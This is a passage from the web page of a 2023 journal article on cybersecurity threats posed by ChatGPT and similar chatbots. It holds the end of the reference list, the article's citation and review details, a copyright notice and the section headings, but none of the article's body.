Mulgrew, A. (2023). I built a Zero Day virus with undetectable exfiltration using only ChatGPT prompts. Forcepoint. Available at: https://www.forcepoint.com/blog/x-labs/zero-day-exfiltration-using-chatgpt-prompts.

Google Scholar

Nav, N. (2022). 91 important ChatGPT statistics & user numbers in april 2023 (GPT-4, plugins update) - nerdy nav. Available at: https://nerdynav.com/chatgpt-statistics/#:∼:text=ChatGPT%20crossed%201%20million%20users.

Google Scholar

Okunytė, P. (2023). How hackers might be exploiting ChatGPT CyberNews. Available at: https://cybernews.c0m/security/hackers-exploit-chatgpt/.

Google Scholar

OpenAI (2023). GPT-4 technical report. Available at: https://cdn.openai.com/papers/gpt-4.pdf.

Google Scholar

OpenAI (2022). Introducing ChatGPT. [online] OpenAI. Available at: https://openai.com/blog/chatgpt.

Google Scholar

Petro, D., and Morris, B. (2017). Weaponizing machine learning: humanity was overrated anyway bishop fox. Available at: https://bishopfox.com/resources/weaponizing-machine-learning-humanity-was-overrated-anyway (Accessed June 13, 2023).

Google Scholar

Radford, A., Narasimhan, K., Salimans, T., and Sutskever, I. (2018). Improving Language understanding by generative pre-training. Available at: https://www.cs.ubc.ca/∼amuham01/LING530/papers/radford2018improving.pdf.

Google Scholar

Rodriguez, J. (2023). ChatGPT: a tool for offensive cyber operations?! Not so fast!. Available at: https://www.trellix.com/en-us/about/newsroom/stories/research/chatgpt-a-tool-for-offensive-cyber-operations-not-so-fast.html (Accessed June 13, 2023).

Google Scholar

Sebastian, G. (2023). Do ChatGPT and other AI chatbots pose a cybersecurity risk? Int. J. Secur. Priv. Pervasive Comput. 15 (1), 1–11. doi:10.4018/ijsppc.320225

CrossRef Full Text | Google Scholar

Singh, A., and Thaware, V. (2017). Wire me through machine learning. Las Vegas: Black Hat USA. Available at: https://www.blackhat.com/docs/us- 17/wednesday/us-17-Singh-Wire-Me-Through-Machine-Learning.pdf.

Google Scholar

Song, J., Cho, C., and Won, Y. (2019). Analysis of operating system identification via fingerprinting and machine learning. Comput. Electr. Eng. 78, 1–10. doi:10.1016/j.compeleceng.2019.06.012

CrossRef Full Text | Google Scholar

Uc-Cetina, V., Navarro-Guerrero, N., Martin-Gonzalez, A., Weber, C., and Wermter, S. (2022). Survey on reinforcement learning for language processing. Artif. Intell. Rev. 56 (2), 1543–1575. doi:10.1007/s10462-022-10205-5

CrossRef Full Text | Google Scholar

Umbrella, C. (2021). 2021 Cyber security threat trends-phishing, crypto top the list. Available at: https://learn-cloudsecurity.cisco.com/umbrella-library/2021-cyber-security-threat-trends-phishing-crypto-top-the-list#page=1.

Google Scholar

Keywords: ChatGPT, AI-powered chatbot, AI-based cyberattacks, AI malware creation, generative AI, cybersecurity threats

Citation: Iqbal F, Samsom F, Kamoun F and MacDermott Á (2023) When ChatGPT goes rogue: exploring the potential cybersecurity threats of AI-powered conversational chatbots. Front. Comms. Net 4:1220243. doi: 10.3389/frcmn.2023.1220243

Received: 10 May 2023; Accepted: 31 July 2023;
Published: 04 September 2023.

Edited by:

Spiridon Bakiras, Singapore Institute of Technology, Singapore

Reviewed by:

Mehran Mozaffari Kermani, University of South Florida, United States
Erald Troja, St. John’s University, United States
Elmahdi Bentafat, Ahmed Bin Mohammed Military College, Qatar

Copyright © 2023 Iqbal, Samsom, Kamoun and MacDermott. This is an open-access article distributed under the terms of the Creative Commons Attribution License (CC BY). The use, distribution or reproduction in other forums is permitted, provided the original author(s) and the copyright owner(s) are credited and that the original publication in this journal is cited, in accordance with accepted academic practice. No use, distribution or reproduction is permitted which does not comply with these terms.

*Correspondence: Farkhund Iqbal, farkhund.iqbal@zu.ac.ae

ORIGINAL RESEARCH article

When ChatGPT goes rogue: exploring the potential cybersecurity threats of AI-powered conversational chatbots

1 Introduction

2 ChatGPT for cybersecurity defense

3 ChatGPT as a potential cybersecurity threat

3.1 ChatGPT for misdirection

3.2 ChatGPT for execution

3.3 ChatGPT for scanning

3.4 ChatGPT for flooding

3.5 ChatGPT for probing and vulnerability detection

3.6 ChatGPT for spoofing

4 Conclusion and implications for research and practice

Data availability statement

Author contributions

Acknowledgments

Conflict of interest

Publisher’s note

References

This article is part of the Research Topic

People also looked at